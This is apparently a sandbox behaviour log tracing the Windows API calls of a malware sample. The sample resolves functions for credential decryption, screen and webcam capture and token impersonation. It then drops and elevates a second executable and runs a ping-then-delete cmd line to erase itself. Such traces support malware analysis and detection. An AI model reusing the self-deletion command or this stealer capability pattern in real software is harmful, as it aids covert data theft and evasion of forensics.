[0045.026] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xadc2c4) returned 0x0 [0045.026] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x77550000 [0045.530] GetProcAddress (hModule=0x77550000, lpProcName="CryptUnprotectData") returned 0x77585a7f [0045.530] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x77550000 [0045.530] GetProcAddress (hModule=0x77550000, lpProcName="CryptProtectData") returned 0x77583615 [0045.530] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x77550000 [0045.531] GetProcAddress (hModule=0x77550000, lpProcName="CryptBinaryToStringA") returned 0x7758a8c5 [0045.531] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0045.531] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0045.531] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0045.531] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0045.531] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0045.531] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0045.531] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0045.531] GetProcAddress (hModule=0x772f0000, lpProcName="wnsprintfA") returned 0x7731edae [0045.531] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0045.532] GetProcAddress (hModule=0x772f0000, lpProcName="wnsprintfW") returned 0x7731ef87 [0045.532] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0045.532] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrA") returned 0x7731c45b [0045.532] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0045.532] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0045.532] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0045.532] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0045.532] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x75660000 [0046.048] GetProcAddress (hModule=0x75660000, lpProcName="NetWkstaGetInfo") returned 0x75665570 [0046.049] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x75660000 [0046.049] GetProcAddress (hModule=0x75660000, lpProcName="NetApiBufferFree") returned 0x756513d2 [0046.049] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.049] GetProcAddress (hModule=0x76d30000, lpProcName="VerSetConditionMask") returned 0x77cb92b9 [0046.049] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.049] GetProcAddress (hModule=0x76d30000, lpProcName="VerifyVersionInfoW") returned 0x76d5d423 [0046.049] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.049] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0046.049] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.049] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0046.049] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.049] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0046.050] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.050] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0046.050] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.050] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0046.050] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.050] GetProcAddress (hModule=0x770a0000, lpProcName="StretchBlt") returned 0x770bb895 [0046.050] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.050] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectW") returned 0x770b6c3a [0046.050] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.050] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0046.050] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.050] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0046.050] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0046.051] GetProcAddress (hModule=0x770a0000, lpProcName="GetDIBits") returned 0x770b6001 [0046.051] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.051] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0046.051] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.051] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0046.051] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0046.051] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0046.051] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.051] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0046.051] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.051] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0046.051] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableW") returned 0x76d41b48 [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.052] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserGeoID") returned 0x76d6acf0 [0046.052] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetGeoInfoW") returned 0x76dd5df3 [0046.053] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetGeoInfoA") returned 0x76dd5272 [0046.053] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0046.053] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0046.053] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0046.053] GetProcAddress (hModule=0x77130000, lpProcName="GetWindowRect") returned 0x77147f34 [0046.053] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0046.053] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.053] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0046.053] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.053] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0046.053] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.054] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0046.054] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.054] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0046.054] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.054] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0046.054] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0046.054] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0046.054] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0046.054] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0046.054] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0046.054] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueW") returned 0x77720e47 [0046.054] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0046.055] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0046.055] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0046.055] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyExA") returned 0x77721481 [0046.055] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0046.055] GetProcAddress (hModule=0x77710000, lpProcName="RegGetValueA") returned 0x7771a9dd [0046.055] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0046.055] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0046.055] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0046.055] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0046.055] LoadLibraryA (lpLibFileName="Avicap32.dll") returned 0x75600000 [0048.340] GetProcAddress (hModule=0x75600000, lpProcName="capCreateCaptureWindowW") returned 0x75601a75 [0048.340] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="GetWindowLongW") returned 0x77146ffe [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowLongW") returned 0x77148332 [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="SetLayeredWindowAttributes") returned 0x7716ec88 [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.341] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0048.341] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.342] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0048.342] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0048.342] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0048.342] LoadLibraryA (lpLibFileName="Avicap32.dll") returned 0x75600000 [0048.342] GetProcAddress (hModule=0x75600000, lpProcName="capGetDriverDescriptionA") returned 0x75601ffe [0048.342] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x76620000 [0049.619] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeEx") returned 0x766609ad [0049.619] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x76620000 [0049.619] GetProcAddress (hModule=0x76620000, lpProcName="IIDFromString") returned 0x76632ff2 [0049.619] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x76620000 [0049.620] GetProcAddress (hModule=0x76620000, lpProcName="CoGetObject") returned 0x7667b68d [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.620] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.620] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.620] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexW") returned 0x76d4424c [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.620] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0049.620] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.621] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0049.621] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0049.621] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0049.621] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.119] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0052.119] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.120] GetProcAddress (hModule=0x758d0000, lpProcName="InternetConnectA") returned 0x758f49e9 [0052.120] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.120] GetProcAddress (hModule=0x758d0000, lpProcName="HttpOpenRequestA") returned 0x758f4c7d [0052.120] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.120] GetProcAddress (hModule=0x758d0000, lpProcName="HttpSendRequestW") returned 0x758fba12 [0052.120] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.120] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0052.120] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0052.120] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0052.120] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.121] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0052.121] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.121] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0052.121] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.121] GetProcAddress (hModule=0x77710000, lpProcName="DuplicateTokenEx") returned 0x7771ca24 [0052.121] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.121] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0052.121] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.121] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0052.121] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.121] GetProcAddress (hModule=0x76d30000, lpProcName="CreateNamedPipeW") returned 0x76dc414b [0052.121] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.122] GetProcAddress (hModule=0x76d30000, lpProcName="ConnectNamedPipe") returned 0x76dc40fb [0052.122] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.122] GetProcAddress (hModule=0x77710000, lpProcName="ImpersonateNamedPipeClient") returned 0x77753369 [0052.122] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.122] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessWithTokenW") returned 0x7775531f [0052.122] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.122] GetProcAddress (hModule=0x77710000, lpProcName="CreateProcessAsUserW") returned 0x7771c592 [0052.122] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.122] GetProcAddress (hModule=0x77710000, lpProcName="RevertToSelf") returned 0x77721562 [0052.122] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.122] GetProcAddress (hModule=0x76d30000, lpProcName="DisconnectNamedPipe") returned 0x76dc41df [0052.123] LoadLibraryA (lpLibFileName="Advapi.dll") returned 0x0 [0052.129] GetProcAddress (hModule=0x0, lpProcName="OpenSCManagerW") returned 0x0 [0052.129] LoadLibraryA (lpLibFileName="Advapi.dll") returned 0x0 [0052.130] GetProcAddress (hModule=0x0, lpProcName="CreateServiceW") returned 0x0 [0052.130] LoadLibraryA (lpLibFileName="Advapi.dll") returned 0x0 [0052.131] GetProcAddress (hModule=0x0, lpProcName="CloseServiceHandle") returned 0x0 [0052.131] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.131] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0052.131] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0052.131] GetProcAddress (hModule=0x772f0000, lpProcName="StrStrW") returned 0x772fe52d [0052.131] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0052.131] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0052.131] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0052.131] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0052.131] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.131] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0052.132] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.132] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0052.132] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.132] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0052.132] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.132] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0052.132] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.132] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0052.132] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.132] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0052.132] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.133] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0052.133] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.133] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0052.133] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.133] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0052.133] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x77710000 [0052.133] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0052.133] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.133] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadContext") returned 0x76d679d4 [0052.133] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.133] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0052.133] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.134] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0052.134] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.134] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0052.134] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.134] GetProcAddress (hModule=0x76d30000, lpProcName="GetKeyboardLayoutList") returned 0x0 [0052.134] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.134] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0052.134] LoadLibraryA (lpLibFileName="Urlmon.dll") returned 0x76810000 [0052.134] GetProcAddress (hModule=0x76810000, lpProcName="URLDownloadToFileW") returned 0x768a66f6 [0052.134] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.135] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpA") returned 0x76d5eceb [0052.135] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.135] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0052.135] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.135] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemInfo") returned 0x76d449ca [0052.135] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0052.135] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExW") returned 0x76d41ae5 [0052.135] GetStartupInfoW (in: lpStartupInfo=0x2afcc0 | out: lpStartupInfo=0x2afcc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0052.135] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0052.135] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4) returned 0x58fbe0 [0052.135] GetKeyboardLayoutList (in: nBuff=1, lpList=0x58fbe0 | out: lpList=0x58fbe0) returned 1 [0052.136] ActivateKeyboardLayout (hkl=0x4090409, Flags=0x100) returned 0x4090409 [0052.183] GetKeyboardLayoutNameW (in: pwszKLID=0x2afcd8 | out: pwszKLID="00000409") returned 1 [0052.183] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x58fbe0 | out: hHeap=0x570000) returned 1 [0052.183] GetCurrentProcess () returned 0xffffffff [0052.183] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2afcc8 | out: TokenHandle=0x2afcc8*=0xc4) returned 1 [0052.183] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x14, TokenInformation=0x2afcd0, TokenInformationLength=0x4, ReturnLength=0x2afccc | out: TokenInformation=0x2afcd0, ReturnLength=0x2afccc) returned 1 [0052.183] CloseHandle (hObject=0xc4) returned 1 [0052.183] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="TrayMSF") returned 0xc4 [0052.184] GetCurrentProcess () returned 0xffffffff [0052.184] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2afcc8 | out: TokenHandle=0x2afcc8*=0xc0) returned 1 [0052.184] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x14, TokenInformation=0x2afccc, TokenInformationLength=0x4, ReturnLength=0x2afcd0 | out: TokenInformation=0x2afccc, ReturnLength=0x2afcd0) returned 1 [0052.184] CloseHandle (hObject=0xc0) returned 1 [0052.184] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="TrayMSF") returned 0xc0 [0052.184] CreateFileW (lpFileName="testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x6, hTemplateFile=0x0) returned 0xc8 [0052.187] WriteFile (in: hFile=0xc8, lpBuffer=0xaf1880*, nNumberOfBytesToWrite=0xdc800, lpNumberOfBytesWritten=0x2afcd4, lpOverlapped=0x0 | out: lpBuffer=0xaf1880*, lpNumberOfBytesWritten=0x2afcd4*=0xdc800, lpOverlapped=0x0) returned 1 [0052.208] Sleep (dwMilliseconds=0xbb8) [0055.232] CloseHandle (hObject=0xc8) returned 1 [0055.249] Sleep (dwMilliseconds=0xbb8) [0058.260] ShellExecuteA (hwnd=0x0, lpOperation="runas", lpFile="testers.exe", lpParameters="", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0070.691] Sleep (dwMilliseconds=0x3e8) [0071.924] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2afa90, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bjqwuj.exe")) returned 0x30 [0071.924] wnsprintfW (in: pszDest=0x2af680, cchDest=260, pszFmt="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"%s\"" | out: pszDest="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"") returned 105 [0071.924] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2af638*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af620 | out: lpCommandLine="cmd.exe /C ping 1.1.1.1 -n 3 -w 3000 > Nul & Del /f /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bjqwuj.exe\"", lpProcessInformation=0x2af620*(hProcess=0x29c, hThread=0x1ec, dwProcessId=0x6c0, dwThreadId=0x664)) returned 1 [0071.936] CloseHandle (hObject=0x1ec) returned 1 [0071.936] CloseHandle (hObject=0x29c) returned 1 [0071.936] ExitProcess (uExitCode=0x0) [0071.939] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584600 | out: hHeap=0x570000) returned 1 Thread: id = 2 os_tid = 0x774 Thread: id = 3 os_tid = 0x7f4 Thread: id = 4 os_tid = 0x54c Thread: id = 5 os_tid = 0x7e4 Process: id = "2" image_name = "testers.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe" page_root = "0x28d78000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa98" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 6 os_tid = 0x318 [0070.933] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x63f910 | out: lpSystemTimeAsFileTime=0x63f910*(dwLowDateTime=0xc7f8c960, dwHighDateTime=0x1d661bd)) [0070.933] GetCurrentThreadId () returned 0x318 [0070.933] GetCurrentProcessId () returned 0x634 [0070.933] QueryPerformanceCounter (in: lpPerformanceCount=0x63f908 | out: lpPerformanceCount=0x63f908*=19132195752) returned 1 [0071.036] GetStartupInfoW (in: lpStartupInfo=0x63f8a0 | out: lpStartupInfo=0x63f8a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x77c5fd35, 